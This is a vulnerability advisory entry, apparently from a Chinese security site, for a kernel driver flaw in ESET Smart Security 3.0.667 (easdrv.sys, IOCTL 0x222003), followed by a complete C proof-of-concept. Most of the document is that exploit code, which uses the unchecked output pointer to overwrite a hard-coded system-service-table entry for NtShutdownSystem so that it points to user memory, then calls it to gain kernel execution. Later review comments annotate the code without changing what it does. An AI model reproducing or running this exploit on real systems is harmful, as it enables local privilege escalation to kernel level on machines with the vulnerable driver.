:::决晓网络研究阵地::: Eset Software Smart Security 3.0.667 描述: BUGTRAQ ID: 30719 CNCAN ID:CNCAN-2008081903
ESET Smart Security是一款集成防火墙,反病毒的应用软件。 ESET Smart Security 'easdrv.sys'驱动存在输入检查问题,本地攻击者可以利用漏洞以内核进程权限执行任意指令。 文件:easdrv.sys .text:00012B92 loc_12B92: .text:00012B92 push [ebp+InputBuf] .text:00012B95 call ds:off_1A200[eax] .text:00012B9B mov ecx, [ebp+OutputBuffer] .text:00012B9E mov [ecx], eax ProbeForRead/Write没有检查输入和输出指针,当input/output指向内核模式内存(高于0x80000000)会导致蓝屏。 上面的代码可通过发送IoControlCode = 0x222003到设备\\.\\easdrv来触及。
<* 参考 http://www.orange-bat.com/adv/2008/adv.08.14.txt *> 测试方法: [www.sebug.net] 以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负! // // ESET SmartSecurity priv. escalation // // visit www.orange-bat.com for full advisory // // g_ // g_ # orange-bat # com
#include <windows.h> #include <stdio.h> #include <ddk/ntifs.h>
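/*
 * Print a diagnostic for the calling thread's last Win32 error.
 *
 * lpszFunction - name of the API call that failed; printed verbatim.
 *
 * The message text comes from FormatMessage and is printed with "%s".  The
 * original passed the assembled text to printf() as the format string; system
 * or driver supplied text containing '%' would then be interpreted as format
 * directives (CWE-134), so the message is now always an argument.
 *
 * Assumes a non-UNICODE build: the file formats LPTSTR data with printf.
 * No return value; output goes to stdout.
 */
void TextError(LPTSTR lpszFunction)
{
    DWORD dw = GetLastError();
    LPVOID lpMsgBuf = NULL;
    DWORD len;

    // Retrieve the system error message for the last-error code.
    len = FormatMessage(
        FORMAT_MESSAGE_ALLOCATE_BUFFER |
        FORMAT_MESSAGE_FROM_SYSTEM |
        FORMAT_MESSAGE_IGNORE_INSERTS,
        NULL,
        dw,
        MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
        (LPTSTR) &lpMsgBuf,
        0, NULL );

    // FormatMessage can fail (unknown code, no message table); the original
    // then called lstrlen() on an uninitialised pointer.  Report the numeric
    // code on its own in that case.
    if (len == 0 || lpMsgBuf == NULL) {
        printf("%s failed with error %lu\n", lpszFunction, (unsigned long)dw);
        return;
    }

    // Message text is data, never a format string.
    printf("%s failed with error %lu: %s", lpszFunction, (unsigned long)dw, (LPCTSTR)lpMsgBuf);

    LocalFree(lpMsgBuf);
}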
/*
 * Open DeviceName and issue a single synchronous DeviceIoControl on it.
 *
 * DeviceName   - device path passed to CreateFile (main() uses \\.\easdrv).
 * Ioctl        - control code forwarded unchanged to the driver.
 * InputBuffer  - address handed to the driver as the input buffer.  It is
 *                declared DWORD and cast to PVOID below, so this code is
 *                32-bit only.
 * InputLen     - byte length reported for InputBuffer.
 * OutputBuffer - address handed to the driver as the output buffer, also a
 *                DWORD cast to PVOID.  The advisory above states the driver
 *                does not validate this pointer (no ProbeForWrite) before
 *                storing through it; validating it in the driver is the fix.
 * OutputLen    - byte length reported for OutputBuffer.
 *
 * Returns FALSE only when CreateFile fails.  NOTE(review): the result of
 * DeviceIoControl is reported through TextError but not returned — the
 * function returns TRUE even when the IOCTL failed, so callers cannot
 * distinguish "device opened" from "IOCTL succeeded".  The return value of
 * CloseHandle is ignored and IoStatusBlock is never used.
 */
BOOL TestIOCTL(PCHAR DeviceName, DWORD Ioctl, DWORD InputBuffer, DWORD InputLen, DWORD OutputBuffer, DWORD OutputLen )
{
    HANDLE hDevice;                 // handle to the drive to be examined
    BOOL bResult;                   // results flag
    DWORD junk;                     // discard results
    IO_STATUS_BLOCK IoStatusBlock;  // declared but not used

    hDevice = CreateFile(DeviceName,
                         0,                  // no access to the drive
                         FILE_SHARE_READ |   // share mode
                         FILE_SHARE_WRITE,
                         NULL,               // default security attributes
                         OPEN_EXISTING,      // disposition
                         0,                  // file attributes
                         NULL);              // do not copy file attributes

    if (hDevice == INVALID_HANDLE_VALUE)     // cannot open the drive
    {
        TextError("CreateFile");
        return (FALSE);
    }

    bResult = DeviceIoControl(hDevice,       // device to be queried
                              Ioctl,
                              (PVOID)InputBuffer, InputLen,
                              (PVOID)OutputBuffer, OutputLen,  // output buffer
                              &junk,         // # bytes returned
                              (LPOVERLAPPED)NULL);  // synchronous I/O

    if(!bResult){
        TextError("DeviceIoControl");   // failure is printed, not propagated
    }

    CloseHandle(hDevice);

    return TRUE;
}
/*
 * Commit 0x1337 bytes of read/write/execute memory at user address lpBase.
 *
 * lpBase - requested base address, passed as a DWORD and cast to LPVOID
 *          (32-bit only).
 *
 * Returns 1 when VirtualAlloc succeeds, 0 after printing the error via
 * TextError.  Nothing in this file releases the mapping.
 */
int AllocMem(DWORD lpBase){

    PVOID lpvResult;

    lpvResult = VirtualAlloc( (LPVOID) lpBase,  // Next page to commit
                              0x1337,           // Page size, in bytes
                              MEM_COMMIT,       // Allocate a committed page
                              PAGE_EXECUTE_READWRITE);  // Read/write access
    if (lpvResult == NULL ){
        TextError("VirtualAlloc");
        return 0;
    } else {
        printf("VirtualAlloc success\n");
    }

    return 1;
}
/*
 * Proof-of-concept entry point for the advisory reproduced above.
 *
 * What the code does, in order: commit a page at user address 0x80000
 * (AllocMem), send IOCTL 0x222003 to \\.\easdrv twice with the output
 * pointer set to SSDT-1 and then SSDT+2, print two status lines, sleep two
 * seconds and call NtShutdownSystem(0).
 *
 * SSDT is a hard-coded kernel address; the trailing comment on its
 * assignment looks like a debugger listing naming nt!NtShutdownSystem, so
 * the value is specific to one kernel build and is not derived at run time.
 * NtShutdownSystem is presumably declared by <ddk/ntifs.h> (included above).
 *
 * NOTE(review): &Input is passed where TestIOCTL expects a DWORD, an
 * implicit pointer-to-integer conversion that only works on 32-bit builds.
 * Ioctl, ILen and OLen are declared but never used; Output is assigned and
 * never read.  Because TestIOCTL returns TRUE whenever the device opened,
 * the else branch ("Failed to open device") is reached only when CreateFile
 * fails, not when the IOCTL itself fails.
 *
 * Returns 1 when AllocMem fails, 0 otherwise (if the process is still
 * running).
 */
int main(int argc, char *argv[])
{
    DWORD Ioctl, Input, ILen, Output, OLen;
    DWORD SSDT;

    if(!AllocMem(0x80000)){
        return 1;
    }

    Input = 12345678;
    SSDT = 0x80501414;  //80501414 8060786e nt!NtShutdownSystem

    Output = 0;
    if(TestIOCTL("\\\\.\\easdrv", 0x222003, &Input, 4, SSDT-1, 4)){
        // Second IOCTL, same input, output pointer moved by three bytes.
        TestIOCTL("\\\\.\\easdrv", 0x222003, &Input, 4, SSDT+2, 4);

        printf("NtShutdownSystem now points to 0x80000 :)");
        printf("Jump to hyperspace in 2 seconds..");
        Sleep(2*1000);
        NtShutdownSystem(0);
    } else{
        printf("Failed to open device");
    }

    return 0;
}